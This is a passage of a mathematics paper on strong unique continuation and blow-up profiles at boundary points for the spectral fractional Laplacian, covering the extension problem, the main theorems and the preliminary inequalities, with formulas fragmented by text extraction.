37
+ Almgren-type frequency function and a blow up analysis. This local approach is made possible by
38
+ the extension result [6, Theorem 2.5] due to Caffarelli and Stinga, see also [23].
39
+ The development of a monotonicity formula for the extended problem presents new difficulties
40
+ when dealing with boundary points. Indeed, since the point x0 from which the unique continuation
41
+ is sought after lies on ∂Ω, the geometry of ∂Ω can interfere with the monotonicity argument. In the
42
+ present paper, we face this difficulty by straightening the boundary with a local diffeomorphism
43
+ that transfers the information about the geometry of ∂Ω into a coefficient matrix in the operator,
44
+ Date: January 27, 2023.
45
+ The authors are partially supported by the INDAM-GNAMPA 2022 grant “Questioni di esistenza e unicit`a
46
+ per problemi non locali con potenziali”. Part of this work was carried out while A. De Luca and V. Felli were
47
+ participating in the research program “Geometric Aspects of Nonlinear Partial Differential Equations” at Institut
48
+ Mittag-Leffler in Djursholm, Sweden, in 2022.
49
+ 1
50
+
51
+ 2
52
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
53
+ which turns out to be a perturbation of the identity if the boundary is regular enough, see Section
54
+ 3. Secondly, a Pohozaev type identity is needed to differentiate the frequency function and to
55
+ develop the monotonicity argument. To this aim, we rely on a more general result contained in
56
+ [12, Proposition 2.3], which is based on a Sobolev-type regularity theory for a class of degenerate
57
+ and singular problems. Furthermore, a blow-up analysis provides a detailed description of the
58
+ asymptotic behaviour of solutions to (1) at x0, giving a complete classification of the order of
59
+ homogeneity of asymptotic profiles, see Theorem 1.2 below. For this purpose, an important role
60
+ is played by an eigenvalue problem on a half-sphere under a symmetry condition, see (19).
61
+ The extension problem corresponding to (1) consists of a degenerate or singular equation on
62
+ the cylinder Ω× (0, +∞), with a homogeneous Dirichlet boundary condition on the lateral surface
63
+ ∂Ω × (0, +∞) and a Neumann derivative on the basis Ω × {0} being equal to the right hand side
64
+ of (1), see (17). Therefore, the formulation of the problem in terms of the extension leads us to
65
+ study what happens near a point of the edge at which a transition between boundary conditions
66
+ of a different type takes place. We observe that this situation is quite different from the one
67
+ that occurs in [9], where unique continuation from boundary points is studied for the restricted
68
+ fractional Laplacian; indeed the extension problem corresponding to the case treated in [9] is a
69
+ degenerate or singular problem with mixed conditions that vary on a flat basis rather than on
70
+ an edge. In fact, the analysis carried out in the present paper highlights different asymptotic
71
+ behaviors at the boundary for the two operators, unlike what happens at internal points, where
72
+ the locally equivalent form of the extended problems induces the same blow-up profiles.
73
+ In order to introduce a suitable functional setting and give a weak formulation of (1), we recall
74
+ the definition of the spectral fractional Laplacian, which can be given in terms of the Dirichlet
75
+ eigenvalues of the Laplacian, see e.g. [7], [18] and [1]. From classical spectral theory, the Dirichlet
76
+ eigenvalue problem
77
+
78
+ −∆ϕ = µϕ,
79
+ in Ω,
80
+ ϕ = 0,
81
+ on ∂Ω,
82
+ admits an increasing and diverging sequence {µk}k∈N\{0} of positive eigenvalues (repeated accord-
83
+ ing to their multiplicity). Furthermore, there exists an orthonormal basis of L2(Ω) made of the
84
+ corresponding eigenfunctions {ϕk}k∈N\{0}. Every v ∈ L2(Ω) can be expanded with respect to the
85
+ basis {ϕk}k∈N\{0} as
86
+ v =
87
+
88
+
89
+ k=1
90
+ (v, ϕk)L2(Ω)ϕk
91
+ in L2(Ω),
92
+ where (v, ϕk)L2(Ω) is the L2-scalar product, i.e. (v1, v2)L2(Ω) =
93
+
94
+ Ω v1v2 dx.
95
+ We introduce the functional space
96
+ Hs(Ω) :=
97
+
98
+ v ∈ L2(Ω) :
99
+
100
+
101
+ k=1
102
+ µs
103
+ k(v, ϕk)2
104
+ L2(Ω) < +∞
105
+
106
+ which is a Hilbert space with respect to the scalar product
107
+ (2)
108
+ (v1, v2)Hs(Ω) :=
109
+
110
+
111
+ k=0
112
+ µs
113
+ k(v1, ϕk)L2(Ω)(v2, ϕk)L2(Ω),
114
+ v1, v2 ∈ Hs(Ω).
115
+ A more explicit characterization of the space Hs(Ω) is provided by the interpolation theory, see
116
+ [3, Section 3.1.3] and [17]:
117
+ Hs(Ω) = [H1
118
+ 0(Ω), L2(Ω)]1−s =
119
+
120
+ Hs
121
+ 0(Ω),
122
+ if s ∈ (0, 1) \ { 1
123
+ 2},
124
+ H1/2
125
+ 00 (Ω),
126
+ if s = 1
127
+ 2.
128
+ Here, denoting as Hs(Ω) the usual fractional Sobolev space W s,2(Ω), Hs
129
+ 0(Ω) is the closure of
130
+ C∞
131
+ c (Ω) in Hs(Ω), and
132
+ H1/2
133
+ 00 (Ω) :=
134
+
135
+ u ∈ H
136
+ 1
137
+ 2
138
+ 0 (Ω) :
139
+
140
+
141
+ u2(x)
142
+ d(x, ∂Ω) dx < +∞
143
+
144
+ ,
145
+
146
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
147
+ 3
148
+ where d(x, ∂Ω) := inf{|x − y| : y ∈ ∂Ω}. We recall that Hs(Ω) = Hs
149
+ 0(Ω) if s ∈ (0, 1
150
+ 2], see [17].
151
+ Moreover, if s ̸= 1
152
+ 2, the trivial extension by 0 outside Ω defines a linear and continuous operator
153
+ from Hs
154
+ 0(Ω) into Hs(RN), see [5, Remark 2.5 and Proposition B.1]. On the other hand, the trivial
155
+ extension defines a linear and continuous operator from H1/2
156
+ 00 (Ω) into H1/2(RN), as one can easily
157
+ deduce from estimate (B.2) in [5]. Then
158
+ ι : Hs(Ω) → Hs(RN),
159
+ (3)
160
+ v �→ ˜v =
161
+
162
+ v,
163
+ in Ω,
164
+ 0,
165
+ in RN \ Ω,
166
+ is a linear and continuous operator.
167
+ It is easy to verify that, if v ∈ Hs(Ω), then the series �∞
168
+ k=1 µs
169
+ k(v, ϕk)L2(Ω)ϕk converges in
170
+ the dual space (Hs(Ω))∗ to some F ∈ (Hs(Ω))∗ such that (Hs(Ω))∗⟨F, ϕk⟩Hs(Ω) = µs
171
+ k(v, ϕk)L2(Ω).
172
+ Hence, for every v ∈ Hs(Ω), we can define its spectral fractional Laplacian as
173
+ (4)
174
+ (−∆)sv =
175
+
176
+
177
+ k=1
178
+ µs
179
+ k(v, ϕk)L2(Ω)ϕk ∈ (Hs(Ω))∗.
180
+ Actually, the spectral fractional Laplacian is the Riesz isomorphism between Hs(Ω) endowed with
181
+ the scalar product (2) and its dual (Hs(Ω))∗, i.e.
182
+ (5)
183
+ (Hs(Ω))∗⟨(−∆)sv1, v2⟩Hs(Ω) = (v1, v2)Hs(Ω)
184
+ for all v1, v2 ∈ Hs(Ω).
185
+ The spectral fractional Laplacian defined in (4) is a different operator from the usual fractional
186
+ Laplacian defined by the Fourier transformation as
187
+ (6)
188
+ F((−∆)sv)(ξ) := |ξ|2s�v(ξ)
189
+ for any v ∈ S(RN). Indeed, the spectral fractional Laplacian depends on the domain Ω and it
190
+ is a global operator in Ω, while the fractional Laplacian is a global operator on the whole RN.
191
+ Moreover, the eigenfunctions of the spectral fractional Laplacian coincide with the eigenfunctions
192
+ of the Dirichlet Laplacian, hence they are smooth up to the boundary if Ω is sufficiently regular;
193
+ on the other hand, the eigenfunctions of the restricted fractional Laplacian, defined by restricting
194
+ the operator in (6) to act only on functions vanishing outside Ω, are only H¨older continuous, see
195
+ [21].
196
+ Within the functional setting introduced above, we can give the notion of weak solution to (1).
197
+ To this purpose, we assume that
198
+ (7)
199
+ h ∈ W 1, N
200
+ 2s +ε(Ω)
201
+ for some ε ∈ (0, 1). We note that it is not restrictive to assume ε small. In view of (5), we say
202
+ that a function u ∈ Hs(Ω) is a weak solution to (1) if
203
+ (8)
204
+ (u, φ)Hs(Ω) =
205
+
206
+
207
+ h(x)u(x)φ(x) dx
208
+ for any φ ∈ C∞
209
+ c (Ω).
210
+ The right hand side in (8) is finite in view of (7), the H¨older’s inequality, and the following
211
+ fractional Sobolev inequality
212
+ ∥v∥L2∗s (Ω) ≤ KN,s ∥v∥Hs(Ω)
213
+ for any v ∈ Hs
214
+ 0(Ω),
215
+ where
216
+ (9)
217
+ 2∗
218
+ s :=
219
+ 2N
220
+ N − 2s,
221
+ and KN,s > 0 is a positive constant depending only on N and s, see e.g. [10, Theorem 6.5] and
222
+ [5, Remark 2.5 and Proposition B.1].
223
+ In order to establish a unique continuation property at a fixed point x0 ∈ ∂Ω, we need to
224
+ assume some regularity on the boundary of Ω near x0; more precisely, we assume that there exist
225
+ a radius R > 0 and a function g such that
226
+ (10)
227
+ g ∈ C1,1(RN−1, R)
228
+
229
+ 4
230
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
231
+ and, up to rigid motions, letting x = (x′, xN) ∈ RN−1 × R,
232
+ ∂Ω ∩ B′
233
+ R(x0) = {(x′, xN) ∈ B′
234
+ R(x0) : xN = g(x′)},
235
+ (11)
236
+ Ω ∩ B′
237
+ R(x0) = {(x′, xN) ∈ B′
238
+ R(x0) : xN < g(x′)},
239
+ (12)
240
+ where, for any r > 0 and x ∈ RN,
241
+ (13)
242
+ B′
243
+ r(x) := {y ∈ RN : |y − x| < r}.
244
+ The spectral fractional Laplacian defined in (4) turns out to be a nonlocal operator on Ω. As
245
+ we intend to use an approach based on local doubling inequalities, which are deduced from an
246
+ Almgren-type monotonicity formula in the spirit of [13], it is quite natural to deal with the local
247
+ realization of the spectral fractional Laplacian.
248
+ This is obtained by the extension procedure
249
+ described in [6] (see also [23] and [7]) which transforms (1) into a singular or degenerate problem
250
+ on a cylinder contained in a N + 1-dimensional space.
251
+ More precisely, we consider the half-space RN+1
252
+ +
253
+ := RN ×(0, ∞), whose total variable is denoted
254
+ as z = (x, t) ∈ RN ×[0, ∞). For any open set E ⊆ RN ×(0, ∞), let H1(E, t1−2s) be the completion
255
+ of C∞
256
+ c (E) with respect to the norm
257
+ ∥φ∥H1(E,t1−2s) :=
258
+ ��
259
+ E
260
+ t1−2s(φ2 + |∇φ|2) dz
261
+ � 1
262
+ 2
263
+ .
264
+ By [16, Theorem 11.11, Theorem 11.2, 11.12 Remarks(iii)] and the extension theorems for weighted
265
+ Sobolev spaces with weights in the Muckenhoupt’s A2 class proved in [8], for any open Lipschitz
266
+ set E ⊆ RN × (0, ∞), the space H1(E, t1−2s) can be characterized as
267
+ H1(E, t1−2s) =
268
+
269
+ v ∈ W 1,1
270
+ loc (E) :
271
+
272
+ E
273
+ t1−2s(v2 + |∇v|2) dz < +∞
274
+
275
+ .
276
+ We define
277
+ (14)
278
+ CΩ := Ω × (0, +∞),
279
+ ∂LCΩ := ∂Ω × [0, +∞),
280
+ and
281
+ H1
282
+ 0,L(CΩ, t1−2s) := {φ ∈ C∞
283
+ c (CΩ) : φ = 0 on ∂LCΩ}
284
+ ∥·∥H1(CΩ,t1−2s),
285
+ i.e. H1
286
+ 0,L(CΩ, t1−2s) is the closure in H1(CΩ, t1−2s) of {φ ∈ C∞
287
+ c (CΩ) : φ = 0 on ∂LCΩ}. Furthermore
288
+ there exists a linear and continuous trace operator
289
+ (15)
290
+ TrΩ : H1
291
+ 0,L(CΩ, t1−2s) → Hs(Ω)
292
+ which is also onto (see [7, Proposition 2.1]).
293
+ Moreover, in [7] it is observed that, for every
294
+ v ∈ Hs(Ω), the minimization problem
295
+ min
296
+ w∈H1
297
+ 0,L(CΩ,t1−2s)
298
+ TrΩ(w)=v
299
+ ��
300
+ CΩ
301
+ t1−2s|∇w(x, t)|2 dx dt
302
+
303
+ has a unique minimizer H(v) = V ∈ H1
304
+ 0,L(CΩ, t1−2s) which solves
305
+ (16)
306
+
307
+
308
+
309
+
310
+
311
+
312
+
313
+
314
+
315
+ div(t1−2s∇V ) = 0,
316
+ in CΩ,
317
+ TrΩ(V ) = v,
318
+ on Ω × {0},
319
+ V = 0,
320
+ on ∂Ω × [0, +∞),
321
+ − limt→0+ t1−2s ∂V
322
+ ∂t = κs,N(−∆)sv,
323
+ on Ω × {0},
324
+ where κs,N > 0 is a positive constant depending only on N and s.
325
+ Equation (16) has to be
326
+ interpreted in a weak sense, that is
327
+
328
+ CΩ
329
+ t1−2s∇V · ∇φ dz = κs,N(v, TrΩ(φ))Hs(Ω)
330
+ for all φ ∈ H1
331
+ 0,L(CΩ, t1−2s),
332
+
333
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
334
+ 5
335
+ in view of (5). Hence, if u ∈ Hs(Ω) solves (1), then its extension H(u) = U ∈ H1
336
+ 0,L(CΩ, t1−2s)
337
+ weakly solves
338
+ (17)
339
+
340
+
341
+
342
+
343
+
344
+
345
+
346
+
347
+
348
+ div(t1−2s∇U) = 0,
349
+ in CΩ,
350
+ TrΩ(U) = u,
351
+ on Ω × {0},
352
+ U = 0,
353
+ on ∂Ω × [0, +∞),
354
+ − limt→0+ t1−2s ∂U
355
+ ∂t = κs,Nhu,
356
+ on Ω × {0},
357
+ according to (16), namely
358
+ (18)
359
+
360
+ CΩ
361
+ t1−2s∇U · ∇φ dz = κs,N
362
+
363
+
364
+ hu TrΩ(φ) dx
365
+ for all φ ∈ H1
366
+ 0,L(CΩ, t1−2s).
367
+ The asymptotic behavior at x0 ∈ ∂Ω of any solution U of (17), and consequently of any solution
368
+ u of (1), turns out to be related to the eigenvalues of the following problem
369
+ (19)
370
+
371
+
372
+
373
+
374
+
375
+
376
+
377
+
378
+
379
+ − divS(θ1−2s
380
+ N+1 ∇SY ) = µ θ1−2s
381
+ N+1 Y,
382
+ on S+
383
+ limθN+1→0+ θ1−2s
384
+ N+1 ∇SY · ν = 0,
385
+ on S′,
386
+ Y ∈ H1
387
+ odd(S+, θ1−2s
388
+ N+1 ),
389
+ where
390
+ S := {θ = (θ′, θN, θN+1) ∈ RN+1 : |θ′|2 + θ2
391
+ N + θ2
392
+ N+1 = 1},
393
+ S+ := {θ = (θ′, θN, θN+1) ∈ S : θN+1 > 0},
394
+ S′ := ∂S+ = {θ = (θ′, θN, θN+1) ∈ S : θN+1 = 0},
395
+ and ν is the outer normal vector to S+ on S′, that is ν = −(0, . . . , 0, 1). We consider the weighted
396
+ space
397
+ L2(S+, θ1−2s
398
+ N+1 ) :=
399
+
400
+ Ψ : S+ → R measurable :
401
+
402
+ S+ θ1−2s
403
+ N+1 Ψ2 dS < +∞
404
+
405
+ ,
406
+ where dS denotes the volume element on N-dimensional spheres. In order to introduce the space
407
+ H1
408
+ odd(S+, θ1−2s
409
+ N+1 ) in which problem (19) is formulated, we first denote by H1(S+, θ1−2s
410
+ N+1 ) the com-
411
+ pletion of C∞(S+) with respect to the norm
412
+ ∥φ∥H1(S+,θ1−2s
413
+ N+1 ) :=
414
+ ��
415
+ S+ θ1−2s
416
+ N+1 (φ2 + |∇Sφ|2) dS
417
+ �1/2
418
+ .
419
+ Then we define
420
+ (20)
421
+ H1
422
+ odd(S+, θ1−2s
423
+ N+1) := {Ψ ∈ H1(S+, θ1−2s
424
+ N+1) : Ψ(θ′, θN, θN+1) = −Ψ(θ′, −θN, θN+1)}.
425
+ It is easy to verify that H1
426
+ odd(S+, θ1−2s
427
+ N+1 ) is a closed subspace of H1(S+, θ1−2s
428
+ N+1 ).
429
+ A function Y ∈ H1
430
+ odd(S+, θ1−2s
431
+ N+1 ) is an eigenfunction of (19) if Y ̸≡ 0 and
432
+ (21)
433
+
434
+ S+ θ1−2s
435
+ N+1 ∇SY · ∇SΨ dS = µ
436
+
437
+ S+ θ1−2s
438
+ N+1Y Ψ dS
439
+ for all Ψ ∈ H1
440
+ odd(S+, θ1−2s
441
+ N+1 ).
442
+ By classical spectral theory, the set of the eigenvalues of problem (19) is an increasing and
443
+ diverging sequence of positive real numbers {µm}m∈N\{0}. In Appendix A we explicitly determine
444
+ the sequence {µm}m∈N\{0}, obtaining that, for all m ∈ N \ {0},
445
+ (22)
446
+ µm =
447
+
448
+ m2 + m(N − 2s),
449
+ if N > 1,
450
+ (2m − 1)2 + (2m − 1)(N − 2s),
451
+ if N = 1.
452
+
453
+ 6
454
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
455
+ Let, for future reference,
456
+ Vm be the eigenspace of problem (19) associated to the eigenvalue µm,
457
+ (23)
458
+ Mm be the dimension of Vm,
459
+ (24)
460
+ {Ym,k : m ∈ N \ {0} and k ∈ {1, . . ., Mm}} be an orthonormal basis of L2(S+, θ1−2s
461
+ N+1 )
462
+ (25)
463
+ such that {Ym,k : k = 1, . . . , Mm} is a basis of Vm.
464
+ Remark 1.1. Let Y be an eigenfunction of (19) associated to the eigenvalue m2 + m(N − 2s).
465
+ Then Y can not vanish identically on S′.
466
+ Indeed, if Y ≡ 0 on S′, we would have that V (rθ) := rmY (θ) would solve div(t1−2s∇V ) = 0
467
+ on RN+1
468
+ +
469
+ , satisfying both Neumann and Dirichlet boundary condition on RN × {0}. This would
470
+ contradict the unique continuation principle for elliptic equations with weights in the Muckenhoupt
471
+ A2 class, see [13], [24], and [20, Proposition 2.2].
472
+ The main result of the present paper is a complete classification of asymptotic blow-up profiles
473
+ at a point x0 ∈ ∂Ω for solutions of (16) and, in turn, for the corresponding solutions of (1).
474
+ Theorem 1.2. Let N > 2s and Ω ⊂ RN be a bounded Lipschitz domain.
475
+ Let x0 ∈ ∂Ω and
476
+ assume that there exist R > 0 and a function g satisfying (10), (11), and (12). Let u be a non
477
+ trivial solution of (1) in the sense of (8), with h satisfying (7). Then there exists m0 ∈ N \ {0}
478
+ (which is odd in the case N = 1) and an eigenfunction Y of (19) associated to the eigenvalue
479
+ m2
480
+ 0 + m0(N − 2s), such that
481
+ λ−m0u(λx + x0) → |x|m0 �Y
482
+ � x
483
+ |x|, 0
484
+
485
+ as λ → 0+
486
+ in Hs(B′
487
+ 1),
488
+ where B′
489
+ 1 := B′
490
+ 1(0) has been defined in (13), u is trivially extended to zero outside Ω as in (3), and
491
+ (26)
492
+ �Y (θ′, θN, θN+1) =
493
+
494
+ Y (θ′, θN, θN+1),
495
+ if θN < 0,
496
+ 0,
497
+ if θN ≥ 0.
498
+ Unlike the analogous result for the restricted fractional Laplacian established in [9], the order
499
+ of homogeneity of limit profiles does not depend on s and it is always an integer.
500
+ This is a
501
+ consequence of the regularity of the eigenfunctions of (19), see Appendix A for further details. In
502
+ particular, the eigenfunctions of (19), after an even reflection through the equator θN+1 = 0, turn
503
+ out to be smooth thanks to [22, Theorem 1.1]; therefore they are much more regular than the
504
+ solutions of the corresponding problem on the half-sphere appearing in [9] and presenting mixed
505
+ boundary conditions which are responsible for a lower regularity.
506
+ Theorem 1.2 is proved by passing to the trace in the following blow-up result for solutions of
507
+ the extended problem (17).
508
+ Theorem 1.3. Let N > 2s and Ω ⊂ RN be a bounded Lipschitz domain. Let x0 ∈ ∂Ω and assume
509
+ that there exist R > 0 and a function g satisfying (10), (11), and (12). Let U be a non trivial
510
+ solution to (17) in the sense of (18), with h satisfying (7). Then there exist m0 ∈ N\{0} (which is
511
+ odd in the case N = 1) and eigenfunction Y of (19), associated to the eigenvalue m2
512
+ 0 +m0(N −2s),
513
+ such that, letting z0 = (x0, 0),
514
+ (27)
515
+ λ−m0U(λz + z0) → |z|m0 �Y
516
+ � z
517
+ |z|
518
+
519
+ as λ → 0+
520
+ in H1(B+
521
+ 1 , t1−2s),
522
+ where B+
523
+ 1 = {z = (x, t) ∈ RN × (0, +∞) : |z| < 1} and U is trivially extended to zero outside CΩ.
524
+ In Theorem 6.1 a more precise characterization of the function �Y appearing in (26) and (27) is
525
+ given, by writing it as a linear combination of the eigenfunctions Ym0,k with coefficients computed
526
+ in (138).
527
+ From Remark 1.1, Theorem 1.2 and Theorem 1.3 we deduce the following unique continuation
528
+ principles.
529
+
530
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
531
+ 7
532
+ Corollary 1.4. Let N > 2s and Ω ⊂ RN be a bounded Lipschitz domain. Let x0 ∈ ∂Ω and
533
+ assume that there exist R > 0 and a function g satisfying (10), (11), and (12). Let u be a solution
534
+ to (1) in the sense of (8) and U be a solution to (17) in the sense of (18), with h satisfying (7).
535
+ (i) If u(x) = O
536
+
537
+ |x − x0|k�
538
+ as x → x0 for any k ∈ N, then u ≡ 0 in Ω.
539
+ (ii) If U(z) = O
540
+
541
+ |z − (x0, 0)|k�
542
+ as z → (x0, 0) for any k ∈ N, then U ≡ 0 on CΩ.
543
+ The paper is organized as follows.
544
+ In Section 2 we fix some notation used throughout the
545
+ paper and recall some preliminary results concerning functional inequalities and trace operators.
546
+ In Section 3 we apply the local diffeomorphism introduced in [2], see also [9, Section 2], to write
547
+ an equivalent formulation of problem (17) on a domain with a straightened lateral boundary
548
+ in a neighbourhood of x0, see (39). In Section 4 we study the Almgren-type frequency function
549
+ associated to the auxiliary problem (39) and prove its boundedness, on which the blow-up analysis
550
+ developed in Section 5 is based. Finally in Section 6 we prove our main results and in Appendix
551
+ A we compute the eigenvalues of problem (19).
552
+ 2. Notations and preliminaries
553
+ In this section we present some notation used throughout the paper and prove some preliminary
554
+ results concerning functional inequalities and trace operators.
555
+ For every r > 0, let
556
+ B+
557
+ r := {z ∈ RN+1
558
+ +
559
+ : |z| < r},
560
+ S+
561
+ r := {z ∈ RN+1
562
+ +
563
+ : |z| = r},
564
+ B′
565
+ r := {x ∈ RN : |x| < r},
566
+ S′
567
+ r := {x ∈ RN : |x| = r}.
568
+ For every r > 0 we define the space
569
+ H1
570
+ 0,S+
571
+ r (B+
572
+ r , t1−2s) := {φ ∈ C∞(B+
573
+ r ) : φ = 0 in a neighbourhood of S+
574
+ r }
575
+ ∥·∥H1(B+
576
+ r ,t1−2s),
577
+ as the closure in H1(B+
578
+ r , t1−2s) of the set of all functions in C∞(B+
579
+ r ) vanishing in a neighbourhood
580
+ of S+
581
+ r .
582
+ Remark 2.1. Since B+
583
+ r ⊂ B′
584
+ r × (0, +∞), the trivial extension to 0 is a linear and continuous
585
+ operator from H1
586
+ 0,S+
587
+ r (B+
588
+ r , t1−2s) to H1
589
+ 0,L(CB′r, t1−2s).
590
+ Proposition 2.2. For every r > 0 there exists a linear and continuous trace operator
591
+ Tr : H1(B+
592
+ r , t1−2s) → Hs(B′
593
+ r)
594
+ such that the restriction of Tr to H1
595
+ 0,S+
596
+ r (B+
597
+ r , t1−2s) coincides with the restriction of TrB′r to
598
+ H1
599
+ 0,S+
600
+ r (B+
601
+ r , t1−2s). In particular, for every r > 0,
602
+ Tr(H1
603
+ 0,S+
604
+ r (B+
605
+ r , t1−2s)) ⊆ Hs(B′
606
+ r).
607
+ Proof. Thanks to Remark 2.1, the operator TrB′r defined in (15) is well defined on H1
608
+ 0,S+
609
+ r (B+
610
+ r , t1−2s)
611
+ and TrB′r(H1
612
+ 0,S+
613
+ r (B+
614
+ r , t1−2s)) ⊆ Hs(B′
615
+ r). Furthermore, as observed in [15, Proposition 2.1] and
616
+ [4, 17], there exists a linear, continuous trace operator Tr : H1(B+
617
+ r , t1−2s) → Hs(B′
618
+ r). For every
619
+ u ∈ {φ ∈ C∞(B+
620
+ r ) : φ = 0 on a neighbourhood of S+
621
+ r }, we have that Tr(u) = u|B′r×{0} = TrB′r(u).
622
+ By density we conclude that Tr and TrB′r are equal on H1
623
+ 0,S+
624
+ r (B+
625
+ r , t1−2s).
626
+
627
+ We observe that H1(B+
628
+ r , t1−2s) ⊂ W 1,1(B+
629
+ r ), hence, denoting as Tr1 the classical trace operator
630
+ from W 1,1(B+
631
+ r ) to L1(S+
632
+ r ), we can consider its restriction to H1(B+
633
+ r , t1−2s), still denoted as Tr1;
634
+ from [19, Theorem 19.7] and the Divergence Theorem one can easily deduce that, for any r > 0,
635
+ such a restriction is a linear, continuous trace operator
636
+ (28)
637
+ Tr1 : H1(B+
638
+ r , t1−2s) → L2(S+
639
+ r , t1−2s)
640
+ which is also compact. With a slight abuse of notation, from now on we will simply write v instead
641
+ of Tr1(v) on S+
642
+ r .
643
+ We recall from [11, Lemma 2.6] the following Sobolev-type inequality with boundary terms.
644
+
645
+ 8
646
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
647
+ Proposition 2.3. There exists a constant SN,s > 0 such that, for all r > 0 and v ∈ H1(B+
648
+ r , t1−2s),
649
+ (29)
650
+ ��
651
+ B′r
652
+ | Tr(v)|2∗
653
+ s dx
654
+ � 2
655
+ 2∗s
656
+ ≤ SN,s
657
+ ��
658
+ B+
659
+ r
660
+ t1−2s|∇v|2 dz + N − 2s
661
+ 2r
662
+
663
+ S+
664
+ r
665
+ t1−2sv2 dS
666
+
667
+ ,
668
+ where 2∗
669
+ s is defined as in (9).
670
+ The following inequality will be used to obtain estimates on the Almgren frequency function.
671
+ Proposition 2.4. Let ωN be the N-dimensional Lebesgue measure of the unit ball in RN. For
672
+ any r > 0, v ∈ H1(B+
673
+ r , t1−2s) and f ∈ L
674
+ N
675
+ 2s +ε(B′
676
+ r) with ε > 0, we have that
677
+ (30)
678
+
679
+ B′r
680
+ f| Tr(v)|2 dx ≤ ηf(r)
681
+ ��
682
+ B+
683
+ r
684
+ t1−2s|∇v|2 dz + N − 2s
685
+ 2r
686
+
687
+ S+
688
+ r
689
+ t1−2sv2 dS
690
+
691
+ ,
692
+ where
693
+ (31)
694
+ ηf(r) := SN,sω
695
+ 4s2ε
696
+ N(N+2sε)
697
+ N
698
+ ∥f∥L
699
+ N
700
+ 2s +ε(B′r) r
701
+ 4s2ε
702
+ N+2sε .
703
+ Proof. By the H¨older inequality
704
+
705
+ B′r
706
+ f| Tr(v)|2 dx ≤ ∥Tr(v)∥2
707
+ L2∗s (B′r) ∥f∥L
708
+ N
709
+ 2s +ε(B′r) ω
710
+ 4s2ε
711
+ N(N+2sε)
712
+ N
713
+ r
714
+ 4s2ε
715
+ N+2sε .
716
+ Then (30) follows from (29).
717
+
718
+ We also recall the following Hardy-type inequality with boundary terms from [11, Lemma 2.4].
719
+ Proposition 2.5. For any r > 0 and any v ∈ H1(B+
720
+ r , t1−2s)
721
+ (32)
722
+ �N − 2s
723
+ 2
724
+ �2 �
725
+ B+
726
+ r
727
+ t1−2s |v(z)|2
728
+ |z|2
729
+ dz ≤
730
+
731
+ B+
732
+ r
733
+ t1−2s
734
+
735
+ ∇v · z
736
+ |z|
737
+ �2
738
+ dz +
739
+ �N − 2s
740
+ 2r
741
+ � �
742
+ S+
743
+ r
744
+ t1−2sv2 dS.
745
+ The following Poincar´e-type inequality directly follows from (32):
746
+ for all r > 0 and v ∈
747
+ H1(B+
748
+ r , t1−2s)
749
+ (33)
750
+
751
+ B+
752
+ r
753
+ t1−2sv2 dz ≤
754
+ 4r
755
+ (N − 2s)2
756
+
757
+ r
758
+
759
+ B+
760
+ r
761
+ t1−2s|∇v|2 dz + N − 2s
762
+ 2
763
+
764
+ S+
765
+ r
766
+ t1−2sv2 dS
767
+
768
+ .
769
+ Remark 2.6. As a consequence of (33) and by continuity of the trace operator (28), for every
770
+ r > 0 we have that
771
+ ��
772
+ S+
773
+ r
774
+ t1−2sv2 dS +
775
+
776
+ B+
777
+ r
778
+ t1−2s|∇v|2 dz
779
+ �1/2
780
+ is an equivalent norm on H1(B+
781
+ r , t1−2s).
782
+ 3. Straightening the boundary
783
+ Let x0 ∈ ∂Ω, R > 0 and g satisfy (10), (11), and (12). Up to a suitable choice of the coordinate
784
+ system, it is not restrictive to assume that
785
+ x0 = 0,
786
+ g(0) = 0,
787
+ ∇g(0) = 0.
788
+ We use the local diffeomorphism F constructed in [9, Section 2] (see also [2]) to straighten the
789
+ boundary of CΩ in a neighbourhood of 0; for the sake of clarity and completeness we summarize
790
+ its properties in Propositions 3.1 and 3.2 below, referring to [9, Section 2] for their proofs. We
791
+ consider the variable z = (y, t) ∈ RN × [0, ∞) with y = (y′, yN) = (y1, · · · , yN).
792
+ For future
793
+ reference we define
794
+ (34)
795
+ MN :=
796
+
797
+
798
+ IdN−1
799
+ 0
800
+ 0
801
+ 0
802
+ −1
803
+ 0
804
+ 0
805
+ 0
806
+ 1
807
+
808
+  ,
809
+ M ′
810
+ N :=
811
+ � IdN−1
812
+ 0
813
+ 0
814
+ −1
815
+
816
+ ,
817
+ where IdN−1 is the identity (N − 1) × (N − 1) matrix.
818
+
819
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
820
+ 9
821
+ Proposition 3.1. [9, Section 2] There exist F = (F1, . . . , FN+1) ∈ C1,1(RN+1, RN+1) and r0 > 0
822
+ such that F
823
+ ��
824
+ Br0 : Br0 → F(Br0) is a diffeomorphism of class C1,1,
825
+ F(y′, 0, 0) = (y′, g(y′), 0)
826
+ for all y′ ∈ RN−1,
827
+ FN(y′, yN, t) = yN + g(y′)
828
+ for all (y′, yN, t) ∈ RN−1 × R × R,
829
+ FN+1(y, t) = t,
830
+ for all (y, t) ∈ RN × R,
831
+ α(y, t) := det JF (y, t) > 0
832
+ in Br0,
833
+ and
834
+ F({(y′, yN, t) ∈ B+
835
+ r0 : yN = 0}) = ∂LCΩ ∩ F(B+
836
+ r0),
837
+ (35)
838
+ F({(y′, yN, t) ∈ B+
839
+ r0 : yN < 0}) = CΩ ∩ F(B+
840
+ r0),
841
+ (36)
842
+ where ∂LCΩ is defined in (14) and JF (y, t) is the Jacobian matrix of F. Furthermore the following
843
+ properties hold:
844
+ i) JF depends only on the variable y and
845
+ JF (y′, yN) = JF (y) = IdN+1 + O(|y|)
846
+ as |y| → 0+,
847
+ where IdN+1 denotes the identity (N + 1) × (N + 1) matrix and O(|y|) denotes a matrix with
848
+ all entries being O(|y|) as |y| → 0+;
849
+ ii) α(y) = det JF (y) = 1 + O(|y′|2) + O(yN) as |y′| → 0+ and yN → 0;
850
+ iii)
851
+ ∂Fi
852
+ ∂t = ∂FN+1
853
+ ∂yi
854
+ = 0 for any i = 1, . . . , N and ∂FN+1
855
+ ∂t
856
+ = 1.
857
+ For every r > 0, let
858
+ (37)
859
+ Qr := {(y′, yN, t) ∈ B+
860
+ r : yN < 0},
861
+ so that F(Qr0) = CΩ∩F(B+
862
